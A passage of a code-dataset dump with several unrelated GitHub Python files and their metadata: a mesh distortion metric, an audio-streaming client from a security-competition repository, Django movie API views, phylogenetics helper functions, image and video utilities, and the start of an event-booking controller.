U.transpose(1,2).matmul(triangles)\n P_ext = torch.cat([P, torch.zeros(triangles.size(0), 2,1).to(P.device)], dim=-1)\n P_ext_2 = torch.cat([P_ext, torch.ones(P.size(0), 1, 3).to(P.device)], dim=1)\n P_inv = P_ext_2.inverse()\n\n Q = param[faces].transpose(1,2) # Fx2x3\n\n J = Q.matmul(P_inv)\n J = J[:, :2, :2]\n FFF = J.transpose(1,2).matmul(J)\n\n scale_distortion = FFF[:, 0, 0] / FFF[:, 1, 1]\n angle_distortion = FFF[:, 0, 0] * FFF[:, 1, 1]\n\n return scale_distortion, angle_distortion\n", "repo_name": "luca-morreale/neural_surfaces", "sub_path": "utils/distortion.py", "file_name": "distortion.py", "file_ext": "py", "file_size_in_byte": 771, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 31, "dataset": "github-code", "pt": "61", "api": [{"api_name": "torch.svd", "line_number": 11, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 13, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 13, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 14, "usage_type": "call"}, {"api_name": "torch.ones", "line_number": 14, "usage_type": "call"}]} +{"seq_id": "19535459538", "text": "#!/usr/bin/env python3\nimport wave\nimport socket\nimport sys\nimport queue\nimport traceback\nimport threading\n\ntry:\n import pyaudio\nexcept ImportError:\n traceback.print_exc()\n print(\n 'Du har inte installerat PyAudio. Du kan göra det genom att köra \"python -m pip install pyaudio\"'\n )\n\n# Du behöver inte förstå vad den här filen gör för att lösa uppgiften. Kort sagt kopplar den upp sig till servern och streamar ljud från den samtidigt som den skickar upp ljud från din mikrofon. På vissa datorer kan det här funka mindre bra, om du stöter på problem som du inte lyckas fixa försök då på en annan dator eller fråga en lagkamrat att testa på sin egen.\n\n# för att ändra input/output enheter ändra dessa till ints som representerar indexet\ndefault_input = None\ndefault_output = None\n\np = pyaudio.PyAudio()\ndevices = [p.get_device_info_by_index(i) for i in range(p.get_device_count())]\n\npulseindex = None\nfor device in devices:\n if device[\"name\"] == \"pulse\":\n pulseindex = device[\"index\"]\n break\nif not default_output and pulseindex is not None:\n default_output = pulseindex\nif not default_input and pulseindex is not None:\n default_input = pulseindex\n\nprint(\"*\" * 50)\nfor device in devices:\n print(device[\"index\"], device[\"name\"])\n\nif default_input:\n device_input = p.get_device_info_by_index(default_input)\nelse:\n device_input = p.get_default_input_device_info()\n\nif default_output:\n device_output = p.get_device_info_by_index(default_output)\nelse:\n device_output = p.get_default_output_device_info()\n\nprint()\nprint(\"Spelar in från:\", device_input[\"index\"], device_input[\"name\"])\nprint(\"Spelar ljud på:\", device_output[\"index\"], device_output[\"name\"])\nprint(\"För att ändra dessa enheter, redigera filen\")\nif pulseindex is not None:\n print(\"pulse brukar funka bäst på linux datorer\")\nprint(\"*\" * 50)\n\nsamplerate = 16000\nblocksize = 600\nblocksize_bytes = blocksize * 2\n\nrecv_audio = queue.Queue()\nsend_queue = []\n\nn_recv = 0\nn_sent = 0\n\n\ndef better_send(socket, buf):\n while len(buf):\n sent = socket.send(buf)\n buf = buf[sent:]\n return buf\n\n\ndef better_recv(socket, bufsize):\n try:\n buf = b\"\"\n while len(buf) < bufsize:\n buf += socket.recv(bufsize - len(buf))\n return buf\n except ConnectionResetError:\n return b\"\"\n\n\ndef callback(indata, frame_count, time_info, status):\n global send_queue\n\n try:\n if status:\n print(\"error:\", status)\n\n send_queue.extend(indata)\n\n audio = []\n for _ in range(frame_count * 2):\n d = recv_audio.get()\n if d is None:\n print(\"out of data!\")\n return bytes([]), pyaudio.paAbort\n\n audio.append(d)\n\n return bytes(audio), pyaudio.paContinue\n except:\n traceback.print_exc()\n\n\ndef send_blocks_to_server(s):\n global send_queue, n_sent\n\n try:\n while send_queue is not None:\n if len(send_queue) > blocksize_bytes:\n block = send_queue[:blocksize_bytes]\n send_queue = send_queue[blocksize_bytes:]\n\n # print(\"Sending block: \", n_recv - n_sent)\n better_send(s, bytes(block))\n n_sent += len(block)\n except:\n traceback.print_exc()\n\n\nwith socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:\n s.settimeout(5)\n s.connect((sys.argv[1], int(sys.argv[2])))\n\n try:\n stream = p.open(\n format=p.get_format_from_width(2),\n channels=1,\n rate=samplerate,\n input=True,\n output=True,\n frames_per_buffer=blocksize,\n stream_callback=callback,\n input_device_index=device_input[\"index\"],\n output_device_index=device_output[\"index\"],\n )\n except OSError:\n traceback.print_exc()\n print(\n \"Något gick fel vid initialisering av audio. Testa byta audioenheter så kanske det löser sig. Läs texten mellan stjärnorna för mer info om hur man gör det.\"\n )\n exit(1)\n\n t = threading.Thread(target=send_blocks_to_server, args=(s,))\n t.start()\n\n while stream.is_active():\n try:\n while True:\n data = better_recv(s, blocksize_bytes)\n n_recv += len(data)\n # print(\"got\", len(data))\n if data == b\"\":\n recv_audio.put(None)\n print(\"Audio stream ended, playing remaining and exiting...\")\n while not recv_audio.empty():\n pass\n break\n\n for b in data:\n recv_audio.put(b)\n\n except KeyboardInterrupt:\n print(\"exiting...\")\n recv_audio.put(None)\n send_queue = None\n t.join()\n\n break\n", "repo_name": "Kodsport/sakerhetssm-2023-solutions", "sub_path": "kval/misc/telefonsvar/client.py", "file_name": "client.py", "file_ext": "py", "file_size_in_byte": 4887, "program_lang": "python", "lang": "sv", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "traceback.print_exc", "line_number": 12, "usage_type": "call"}, {"api_name": "pyaudio.PyAudio", "line_number": 23, "usage_type": "call"}, {"api_name": "queue.Queue", "line_number": 62, "usage_type": "call"}, {"api_name": "socket.send", "line_number": 71, "usage_type": "call"}, {"api_name": "socket.recv", "line_number": 80, "usage_type": "call"}, {"api_name": "pyaudio.paAbort", "line_number": 100, "usage_type": "attribute"}, {"api_name": "pyaudio.paContinue", "line_number": 104, "usage_type": "attribute"}, {"api_name": "traceback.print_exc", "line_number": 106, "usage_type": "call"}, {"api_name": "traceback.print_exc", "line_number": 122, "usage_type": "call"}, {"api_name": "socket.socket", "line_number": 125, "usage_type": "call"}, {"api_name": "socket.AF_INET", "line_number": 125, "usage_type": "attribute"}, {"api_name": "socket.SOCK_STREAM", "line_number": 125, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 127, "usage_type": "attribute"}, {"api_name": "traceback.print_exc", "line_number": 142, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 148, "usage_type": "call"}]} +{"seq_id": "71447428995", "text": "from rest_framework.decorators import api_view \nfrom rest_framework.response import Response \nfrom rest_framework import status\nfrom .serializers import MovieDetailSerializer, MovieSerializer\nfrom .models import Movie\n \n@api_view(['GET']) \ndef index(request): \n context = {\n 'number' : 100,\n 'float' : 1.11,\n 'text' : \"Hello World\",\n 'list' : [1, 2, 3],\n 'dict' : {\"name\" : 'Beks'}\n }\n return Response(data=context, status=status.HTTP_200_OK)\n\n\n@api_view([\"GET\"])\ndef movie_list_view(request):\n movies = Movie.objects.all()\n data = MovieSerializer(movies, many=True).data\n return Response(data=data)\n\n\n@api_view([\"GET\"])\ndef movie_detail_view(request, id):\n try:\n movie = Movie.objects.get(id=id)\n except Movie.DoesNotExist:\n return Response(status=status.HTTP_404_NOT_FOUND, data={'error':'Movie not found'})\n\n data = MovieDetailSerializer(movie, many=False).data\n return Response(data=data)", "repo_name": "BeksBratan/DjangoRest", "sub_path": "MovieBackend/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 971, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "rest_framework.response.Response", "line_number": 16, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 16, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 16, "usage_type": "name"}, {"api_name": "rest_framework.decorators.api_view", "line_number": 7, "usage_type": "call"}, {"api_name": "models.Movie.objects.all", "line_number": 21, "usage_type": "call"}, {"api_name": "models.Movie.objects", "line_number": 21, "usage_type": "attribute"}, {"api_name": "models.Movie", "line_number": 21, "usage_type": "name"}, {"api_name": "serializers.MovieSerializer", "line_number": 22, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 23, "usage_type": "call"}, {"api_name": "rest_framework.decorators.api_view", "line_number": 19, "usage_type": "call"}, {"api_name": "models.Movie.objects.get", "line_number": 29, "usage_type": "call"}, {"api_name": "models.Movie.objects", "line_number": 29, "usage_type": "attribute"}, {"api_name": "models.Movie", "line_number": 29, "usage_type": "name"}, {"api_name": "models.Movie.DoesNotExist", "line_number": 30, "usage_type": "attribute"}, {"api_name": "models.Movie", "line_number": 30, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 31, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_404_NOT_FOUND", "line_number": 31, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 31, "usage_type": "name"}, {"api_name": "serializers.MovieDetailSerializer", "line_number": 33, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 34, "usage_type": "call"}, {"api_name": "rest_framework.decorators.api_view", "line_number": 26, "usage_type": "call"}]} +{"seq_id": "70410245635", "text": "from scipy import stats\nfrom collections import OrderedDict\nimport sys, re, os, logging, ete3\n\ndef getParams(models, paml, bppml, mixed, Busted, Meme, opb, gnh):\n\t# Check analyses to be run and where the parameters file are\n\n\tdCtrls = {}\n\tlModels = []\n\tif models != \"\":\n\t\tif bppml not in [\"\", \"False\", False]:# and mixed not in [\"\", \"False\", False]:\n\t\t\tdCtrls[\"bppml\"] = bppml\n\t\t\tdCtrls[\"bppmixedlikelihood\"] = mixed\n\t\tif paml not in [\"\", \"False\", False]:\n\t\t\tdCtrls[\"paml\"] = paml\n\t\tlModels = re.compile(\"\\s*,\\s*\").split(models)\n\tif opb != \"\" and opb != False:\n\t\tdCtrls[\"OPB\"] = opb\n\tif gnh != \"\" and gnh != False:\n\t\tdCtrls[\"GNH\"] = gnh\n\tif Busted:\n\t\tdCtrls[\"BUSTED\"] = \"\"\n\tif Meme:\n\t\tdCtrls[\"MEME\"] = \"\"\n\n\treturn dCtrls, lModels\n\ndef supBoot(outDir, baseName, treeFile, logger):\n\t# Suppress bootstrap numbers from treeFile (necessary for HYPHY)\n\tcladoFile = outDir+baseName+\"_clado.tree\"\n\tt = ete3.Tree(treeFile)\n\tt.write(format=9, outfile=cladoFile)\n\treturn cladoFile\n\ndef nbNode(treeFile, logger):\n\t# count number of nodes in tree file\n\twith open(treeFile, \"r\") as tree:\n\t\tdata = tree.read()\n\t\tnodes = str(data.count(\"(\")+data.count(\")\"))\n\t\tlogger.info(\"There are {:s} nodes in the provided tree.\".format(nodes))\n\t\ttree.close()\n\treturn nodes\n\ndef LRT(ll1, ll2, df):\n\t\"\"\"\n\tCalculates likelihood ratio test between two models.\n\t:params ll1, ll2: likelihood of the two models studied\n\t:param df: degrees of freedom of difference between the two models\n\t\"\"\"\n\tstats.chisqprob = lambda chisq, df: stats.chi2.sf(chisq, df)\n\tLR = max(2*(ll2-ll1),0)\n\tp = stats.chisqprob(LR, df)\n\treturn(LR, p)\n\ndef NHXTree(tree):\n\t\"\"\"\n\tTake a newick tree and outputs it in NHX format with branch numbering.\n\t\"\"\"\n\tpattern = re.compile(r\"[,\\)]\")\n\tpar=pattern.findall(tree)\n\tlm=pattern.split(tree)\n\t\n\tnhxpar=[\"[&&NHX:ND=%d]\"%i+par[i] for i in range(len(par))]\n\t\n\tlc=[\"\".join(x) for x in zip(lm,nhxpar)]\n\tsout=\"\".join(lc)+\";\"\n\t\n\treturn sout\n\t\ndef pspFileCreation(path, option):\n if True:\n dparams={}\n dparams[\"alphabet\"] = \"Codon(letter=DNA)\"\n dparams[\"input.data1\"] = \"alignment(file=$(INPUTFILE), format=$(FORMAT), sites_to_use=all, max_gap_allowed=50%, max_unresolved_allowed=100%)\"\n dparams[\"input.tree1\"] = \"user(file=$(TREEFILE), format=Newick)\"\n dparams[\"phylo1\"] = \"Single(process=1, data=1)\"\n if option == \"mixedlikelihood\":\n #dparams[\"params\"] = \"$(PARAMS)\"\n dparams[\"output.likelihoods.file\"] = \"$(OUTINFO)\"\n else:\n dparams[\"root_freq1\"] = \"F3X4(init=observed, data=1)\"\n dparams[\"rate_distribution1\"] = \"$(DISTRIB)\"\n dparams[\"optimization\"] = \"FullD(derivatives=Newton)\"\n dparams[\"optimization.ignore_parameters\"] = \"$(IGNORE)\"\n dparams[\"optimization.max_number_f_eval\"] = \"1000\"\n dparams[\"optimization.tolerance\"] = \"0.00001\"\n dparams[\"output.tree.file\"] = \"$(OUTTREE)\"\n dparams[\"output.tree.format\"] = \"Newick\"\n dparams[\"output.estimates\"] = \"$(OUTPARAMS)\"\n dparams[\"optimization.backup.file\"] = \"$(BACKUP)\"\n if option == \"bppml\":\n dparams[\"model1\"] = \"$(MODEL)\"\n dparams[\"process1\"] = \"Homogeneous(model=1, tree=1, rate=1, root_freq=1)\"\n dparams[\"scenario1\"] = \"split(model=1)\"\n elif option == \"gnh\":\n dparams[\"nonhomogeneous\"] = \"general\"\n dparams[\"nonhomogeneous.number_of_models\"] = \"2\"\n dparams[\"model1\"] = \"YNGP_M1(frequencies=F3X4,initFreqs=observed, data=1)\"\n dparams[\"model2\"] = \"YNGP_M2(frequencies=F3X4,initFreqs=observed,kappa=YNGP_M1.kappa_1,omega=YNGP_M1.omega_1, data=1)\"\n dparams[\"process1\"] = \"NonHomogeneous(model1=1, model1.nodes_id=$(NODES1), model2=2, model2.nodes_id$(NODES2), tree=1, rate=1, root=1)\"\n dparams[\"optimization.ignore_parameters\"] = \"BrLen,*kappa*,*theta*,Ancient\"\n\n with open(path, \"w\") as bppFile:\n bppFile.write(\"\\n\".join([par + \" = \" + val for par,val in dparams.items()]))\n bppFile.close()\n", "repo_name": "leapicard/DGINN", "sub_path": "lib/PSPFunc.py", "file_name": "PSPFunc.py", "file_ext": "py", "file_size_in_byte": 3887, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 14, "dataset": "github-code", "pt": "61", "api": [{"api_name": "re.compile", "line_number": 16, "usage_type": "call"}, {"api_name": "ete3.Tree", "line_number": 31, "usage_type": "call"}, {"api_name": "scipy.stats.chisqprob", "line_number": 50, "usage_type": "attribute"}, {"api_name": "scipy.stats", "line_number": 50, "usage_type": "name"}, {"api_name": "scipy.stats.chi2.sf", "line_number": 50, "usage_type": "call"}, {"api_name": "scipy.stats.chi2", "line_number": 50, "usage_type": "attribute"}, {"api_name": "scipy.stats.chisqprob", "line_number": 52, "usage_type": "call"}, {"api_name": "scipy.stats", "line_number": 52, "usage_type": "name"}, {"api_name": "re.compile", "line_number": 59, "usage_type": "call"}]} +{"seq_id": "31394908135", "text": "from io import BytesIO\nimport os\nfrom typing import Dict, List\n\nimport numpy as np\nimport cv2\nfrom tqdm import tqdm\n\nfrom babylog.data_utils import BoundingBoxDict\nfrom babylog.protobuf import Image, ClassificationResult, BoundingBox\nfrom babylog.logger import babylogger\n\n\ndef bytes_to_image(raw_bytes_: bytes) -> np.ndarray:\n return cv2.imdecode(np.frombuffer(raw_bytes_, np.byte), cv2.IMREAD_ANYCOLOR)\n\n\ndef image_to_bytes(array_: np.ndarray) -> bytes:\n return cv2.imencode(\".jpg\", array_)[1].tobytes()\n\n\ndef ndarray_to_Image(array_: np.ndarray) -> Image:\n assert isinstance(array_, np.ndarray), \"please pass a numpy array\"\n assert len(array_.shape) == 3, \"np.ndarray image has more than 3 dimensions\"\n image = Image(\n **dict(\n zip(\n list(Image.DESCRIPTOR.fields_by_name.keys()),\n [*array_.shape, image_to_bytes(array_=array_)],\n )\n )\n )\n return image\n\n\ndef classification_from_dict(dict_: Dict[str, float]) -> List[ClassificationResult]:\n assert all(\n isinstance(key, str) for key in dict_.keys()\n ), \"classification dict keys are not of type string\"\n assert all(\n isinstance(val, float) for val in dict_.values()\n ), \"classification dict values are not of type float\"\n\n return [\n ClassificationResult(class_name=key_, probability=value_)\n for key_, value_ in dict_.items()\n ]\n\n\ndef check_bbox_dict(dict_: BoundingBoxDict):\n assert all(\n [elem in dict_ for elem in BoundingBoxDict.__annotations__.keys()]\n ), \"incorrect format of the detection dictionary\"\n assert all(\n [\n type(dict_[key_]) == value_\n for key_, value_ in BoundingBoxDict.__annotations__.items()\n if key_ != \"classification\"\n ]\n ), \"incorrect format of the detection dictionary\"\n\n\ndef detection_from_dict(bboxes: List[BoundingBoxDict]) -> List[BoundingBox]:\n detections = []\n for dict_ in bboxes:\n check_bbox_dict(dict_)\n assert set(dict_.keys()) == set(\n BoundingBoxDict.__annotations__.keys()\n ), \"incorrect format of the detection dictionary\"\n classifier_result_ = dict_[\"classification\"]\n dict_.pop(\"classification\")\n bboxes_message = BoundingBox(**dict_)\n bboxes_message.classification_result.extend(\n classification_from_dict(classifier_result_)\n )\n detections.append(bboxes_message)\n return detections\n\n\nclass ImageSequence:\n def __init__(\n self,\n path=None,\n extensions=None,\n timestamp_file=None,\n rotate=False,\n scale=0.5,\n **kwargs\n ):\n self.path = path\n self.rotate = rotate\n self.scale = scale\n self.width = None\n self.height = None\n self.frame_count = None\n self.video = None\n self.images = None\n self.scaled_dim = None\n self.frame_num = 0\n self.playback_speed = 50\n self.raw_video_string = \"Scaled Raw Image\"\n self.frame = None\n self.is_image = False\n self.is_video = False\n\n if timestamp_file is None:\n self.timestamps = None\n else:\n with open(timestamp_file, \"r\") as filehandle:\n self.timestamps = [\n timestamp.rstrip() for timestamp in filehandle.readlines()\n ]\n\n if self.path is not None:\n if self.check_directory():\n self.is_video = False\n if not extensions:\n extensions = [\".jpg\", \".jpeg\", \".png\"]\n self.images = [\n f\n for f in sorted(os.listdir(self.path))\n if os.path.splitext(f)[1] in extensions\n ]\n babylogger.info(\"Found {} images in folder\".format(len(self.images)))\n if not self.images:\n self.is_image = False\n raise NotImplementedError\n else:\n self.is_image = True\n elif self.check_video():\n self.is_video = True\n else:\n raise NotImplementedError\n\n if self.is_video:\n self.video = cv2.VideoCapture(self.path)\n\n self.get_dimensions()\n self.scaled_dim = (int(self.width * self.scale), int(self.height * self.scale))\n config = {\n \"video\": self.is_video,\n \"image\": self.is_image,\n \"scaled dimensions\": self.scaled_dim,\n \"frame count\": self.frame_count,\n }\n babylogger.info(\"[CONFIG video]: {}\".format(config))\n super().__init__(**kwargs)\n\n def check_directory(self):\n return os.path.isdir(self.path)\n\n def check_file(self):\n return os.path.isfile(self.path)\n\n def check_video(self):\n extensions = [\".mp4\", \".avi\"]\n if os.path.splitext(self.path)[1] in extensions:\n return True\n return False\n\n def get_dimensions(self):\n if self.is_video:\n width = self.video.get(cv2.CAP_PROP_FRAME_WIDTH)\n height = self.video.get(cv2.CAP_PROP_FRAME_HEIGHT)\n self.width = width if not self.rotate else height\n self.height = height if not self.rotate else width\n self.frame_count = int(self.video.get(cv2.CAP_PROP_FRAME_COUNT))\n if self.frame_count <= 0:\n self.frame_count = 0\n while True:\n ret, _ = self.video.read()\n if not ret:\n break\n self.frame_count += 1\n self.video.release()\n self.video = cv2.VideoCapture(self.path)\n\n if self.is_image:\n image = cv2.imread(self.path + \"/\" + self.images[0])\n self.width = image.shape[1]\n self.height = image.shape[0]\n self.frame_count = len(self.images)\n\n def get_frame(self, frame_num):\n self.frame_num = frame_num\n if self.is_video:\n self.video.set(cv2.CAP_PROP_POS_FRAMES, frame_num)\n ret, frame = self.video.read()\n if not ret:\n frame = None\n babylogger.info(\"Could not read frame\")\n else:\n pass\n\n if self.is_image:\n image_path = self.images[frame_num]\n try:\n frame = cv2.imread(self.path + \"/\" + image_path)\n except Exception as e:\n babylogger.error(\"{e}\".format(e))\n frame = None\n\n try:\n frame = (\n cv2.rotate(frame, cv2.ROTATE_90_COUNTERCLOCKWISE)\n if self.rotate\n else frame\n )\n frame = cv2.resize(frame, self.scaled_dim, interpolation=cv2.INTER_AREA)\n except cv2.error as e:\n babylogger.error(\"Invalid frame!\")\n frame = None\n pass\n\n self.frame = frame\n\n def check_frames(self, max_frames=300):\n if self.frame_count > max_frames:\n return False\n return True\n\n def get_frames(self):\n for i in tqdm(range(self.frame_count)):\n self.get_frame(i)\n yield self.frame\n", "repo_name": "thebabylonai/babylog", "sub_path": "python/src/babylog/utils.py", "file_name": "utils.py", "file_ext": "py", "file_size_in_byte": 7247, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 156, "dataset": "github-code", "pt": "61", "api": [{"api_name": "cv2.imdecode", "line_number": 15, "usage_type": "call"}, {"api_name": "numpy.frombuffer", "line_number": 15, "usage_type": "call"}, {"api_name": "numpy.byte", "line_number": 15, "usage_type": "attribute"}, {"api_name": "cv2.IMREAD_ANYCOLOR", "line_number": 15, "usage_type": "attribute"}, {"api_name": "numpy.ndarray", "line_number": 14, "usage_type": "attribute"}, {"api_name": "numpy.ndarray", "line_number": 18, "usage_type": "attribute"}, {"api_name": "cv2.imencode", "line_number": 19, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 22, "usage_type": "attribute"}, {"api_name": "numpy.ndarray", "line_number": 23, "usage_type": "attribute"}, {"api_name": "babylog.protobuf.Image", "line_number": 25, "usage_type": "call"}, {"api_name": "babylog.protobuf.Image.DESCRIPTOR.fields_by_name.keys", "line_number": 28, "usage_type": "call"}, {"api_name": "babylog.protobuf.Image.DESCRIPTOR", "line_number": 28, "usage_type": "attribute"}, {"api_name": "babylog.protobuf.Image", "line_number": 28, "usage_type": "name"}, {"api_name": "babylog.protobuf.Image", "line_number": 22, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 36, "usage_type": "name"}, {"api_name": "babylog.protobuf.ClassificationResult", "line_number": 45, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 36, "usage_type": "name"}, {"api_name": "babylog.protobuf.ClassificationResult", "line_number": 36, "usage_type": "name"}, {"api_name": "babylog.data_utils.BoundingBoxDict", "line_number": 50, "usage_type": "name"}, {"api_name": "babylog.data_utils.BoundingBoxDict.__annotations__.keys", "line_number": 52, "usage_type": "call"}, {"api_name": "babylog.data_utils.BoundingBoxDict.__annotations__", "line_number": 52, "usage_type": "attribute"}, {"api_name": "babylog.data_utils.BoundingBoxDict", "line_number": 52, "usage_type": "name"}, {"api_name": "babylog.data_utils.BoundingBoxDict.__annotations__.items", "line_number": 57, "usage_type": "call"}, {"api_name": "babylog.data_utils.BoundingBoxDict.__annotations__", "line_number": 57, "usage_type": "attribute"}, {"api_name": "babylog.data_utils.BoundingBoxDict", "line_number": 57, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 63, "usage_type": "name"}, {"api_name": "babylog.data_utils.BoundingBoxDict", "line_number": 63, "usage_type": "name"}, {"api_name": "babylog.data_utils.BoundingBoxDict.__annotations__.keys", "line_number": 68, "usage_type": "call"}, {"api_name": "babylog.data_utils.BoundingBoxDict.__annotations__", "line_number": 68, "usage_type": "attribute"}, {"api_name": "babylog.data_utils.BoundingBoxDict", "line_number": 68, "usage_type": "name"}, {"api_name": "babylog.protobuf.BoundingBox", "line_number": 72, "usage_type": "call"}, {"api_name": "babylog.protobuf.BoundingBox", "line_number": 63, "usage_type": "name"}, {"api_name": "os.listdir", "line_number": 121, "usage_type": "call"}, {"api_name": "os.path.splitext", "line_number": 122, "usage_type": "call"}, {"api_name": "os.path", "line_number": 122, "usage_type": "attribute"}, {"api_name": "babylog.logger.babylogger.info", "line_number": 124, "usage_type": "call"}, {"api_name": "babylog.logger.babylogger", "line_number": 124, "usage_type": "name"}, {"api_name": "cv2.VideoCapture", "line_number": 136, "usage_type": "call"}, {"api_name": "babylog.logger.babylogger.info", "line_number": 146, "usage_type": "call"}, {"api_name": "babylog.logger.babylogger", "line_number": 146, "usage_type": "name"}, {"api_name": "os.path.isdir", "line_number": 150, "usage_type": "call"}, {"api_name": "os.path", "line_number": 150, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 153, "usage_type": "call"}, {"api_name": "os.path", "line_number": 153, "usage_type": "attribute"}, {"api_name": "os.path.splitext", "line_number": 157, "usage_type": "call"}, {"api_name": "os.path", "line_number": 157, "usage_type": "attribute"}, {"api_name": "cv2.CAP_PROP_FRAME_WIDTH", "line_number": 163, "usage_type": "attribute"}, {"api_name": "cv2.CAP_PROP_FRAME_HEIGHT", "line_number": 164, "usage_type": "attribute"}, {"api_name": "cv2.CAP_PROP_FRAME_COUNT", "line_number": 167, "usage_type": "attribute"}, {"api_name": "cv2.VideoCapture", "line_number": 176, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 179, "usage_type": "call"}, {"api_name": "cv2.CAP_PROP_POS_FRAMES", "line_number": 187, "usage_type": "attribute"}, {"api_name": "babylog.logger.babylogger.info", "line_number": 191, "usage_type": "call"}, {"api_name": "babylog.logger.babylogger", "line_number": 191, "usage_type": "name"}, {"api_name": "cv2.imread", "line_number": 198, "usage_type": "call"}, {"api_name": "babylog.logger.babylogger.error", "line_number": 200, "usage_type": "call"}, {"api_name": "babylog.logger.babylogger", "line_number": 200, "usage_type": "name"}, {"api_name": "cv2.rotate", "line_number": 205, "usage_type": "call"}, {"api_name": "cv2.ROTATE_90_COUNTERCLOCKWISE", "line_number": 205, "usage_type": "attribute"}, {"api_name": "cv2.resize", "line_number": 209, "usage_type": "call"}, {"api_name": "cv2.INTER_AREA", "line_number": 209, "usage_type": "attribute"}, {"api_name": "cv2.error", "line_number": 210, "usage_type": "attribute"}, {"api_name": "babylog.logger.babylogger.error", "line_number": 211, "usage_type": "call"}, {"api_name": "babylog.logger.babylogger", "line_number": 211, "usage_type": "name"}, {"api_name": "tqdm.tqdm", "line_number": 223, "usage_type": "call"}]} +{"seq_id": "30386107154", "text": "import os\nimport sys\nfrom datetime import date, datetime, timedelta\nfrom Views.VistaPrincipal import VistaPrincipal\nfrom Views.VistaCliente import VistaCliente\nfrom Views.VistaServicio import VistaServicio\nfrom Views.VistaEvento import VistaEvento\nfrom Models.Servicio import Servicio\nfrom Models.Evento import Evento\nfrom Models.Cliente import Cliente\n\nclass ControllerPrincipal:\n def __init__(self):\n self.servicio = Servicio(nombre='', costo='')\n self.evento = Evento(fecha=\"\", cliente=\"\", servicio=\"\", senia=\"\", costo=\"\", estado=\"\")\n self.cliente = Cliente(nombre=\"\", apellido=\"\", dni=\"\", direccion=\"\", telefono=\"\")\n self.vistaCliente = VistaCliente()\n self.vistaPrincipal = VistaPrincipal()\n self.vistaServicio = VistaServicio()\n self.vistaEvento = VistaEvento()\n self.listaServicio = []\n self.listaEvento = []\n self.listaServiciosTemporales = []\n self.ingresoFecha=0\n self.ingresoSenia = 0\n \n \n def reset_variables(self):\n self.servicio = Servicio(nombre='', costo='')\n self.evento = Evento(fecha=\"\", cliente=\"\", servicio=\"\", senia=\"\", costo=\"\", estado=\"\")\n self.cliente = Cliente(nombre=\"\", apellido=\"\", dni=\"\", direccion=\"\", telefono=\"\")\n self.vistaCliente = VistaCliente()\n self.vistaPrincipal = VistaPrincipal()\n self.vistaServicio = VistaServicio()\n self.vistaEvento = VistaEvento()\n self.listaServicio = []\n self.listaEvento = []\n self.listaServiciosTemporales = []\n self.ingresoFecha=0\n self.ingresoSenia = 0\n \n \n def menu_principal(self):\n self.limpiar_consola()\n self.iniciar_servicio()\n self.iniciar_evento()\n self.vistaPrincipal.menu_presentacion()\n self.vistaPrincipal.menu_opciones()\n ingreso = 1\n while ingreso >= 1 and ingreso <= 6:\n ingreso = self.vistaPrincipal.ingreso_menu()\n if ingreso == '0':\n ingreso = 0\n self.limpiar_consola()\n self.vistaPrincipal.saludo_final()\n sys.exit()\n elif ingreso == '1':\n ingreso = 1\n self.mostrar_servicios()\n self.menu_principal()\n elif ingreso == '2':\n ingreso = 2\n self.limpiar_consola()\n self.listaServicio = self.servicios_para_elegir()\n self.menu_principal()\n elif ingreso == '3':\n ingreso = 3\n self.limpiar_consola()\n self.modificar_servicios_seleccionados() \n elif ingreso == '4':\n ingreso = 4\n self.limpiar_consola()\n self.consultar_disponibilidad()\n self.menu_principal()\n elif ingreso == '5':\n ingreso = 5\n self.limpiar_consola()\n costo = self.calcular_costo()\n self.mostrar_costo(costo,self.evento.get_costo())\n self.menu_principal() \n elif ingreso == '6':\n ingreso = 6\n self.limpiar_consola()\n self.carga_nombre()\n self.carga_apellido()\n self.carga_dni()\n self.carga_direccion()\n self.carga_telefono()\n self.carga_senia()\n self.menu_principal() \n elif ingreso == '7':\n ingreso = 7 \n self.limpiar_consola()\n self.cancelar_evento()\n self.menu_principal() \n elif ingreso == '8':\n ingreso = 8 \n self.limpiar_consola()\n self.verificar_reserva()\n #self.menu_principal() \n else:\n self.vistaPrincipal.error_ingreso()\n ingreso = 1\n \n \n def iniciar_servicio(self):\n try:\n self.listaServicio = []\n with open(\"servicios.txt\", 'r') as file:\n file.seek(0)\n archivo = file.readlines()\n for line in archivo:\n item = line.strip().split(';')\n self.servicio = Servicio(item[0], item[1])\n self.listaServicio.append(self.servicio) \n return self.servicio \n except Exception as e:\n print(f\"A ocurrido el siguiente error: {e}\")\n \n \n def iniciar_evento(self):\n try:\n with open(\"eventos.txt\", 'r') as file:\n file.seek(0)\n archivo = file.readlines()\n for line in archivo:\n item = line.strip().split(';')\n self.evento = Evento(item[0], item[1], item[2], item[3], item[4], item[5])\n self.listaEvento.append(self.evento) \n except Exception as e:\n print(f\"A ocurrido el siguiente error: {e}\") \n \n \n \n def total_lineas_archivo(self):\n try:\n with open(\"servicios.txt\", 'r') as file:\n lineas = file.readlines()\n return len(lineas)\n except Exception as e:\n print(f\"A ocurrido el siguiente error: {e}\")\n \n \n \n def servicios_elegidos(self, estado):\n try:\n with open(\"servicios.txt\", 'r') as file:\n archivo = file.readlines()\n cont = 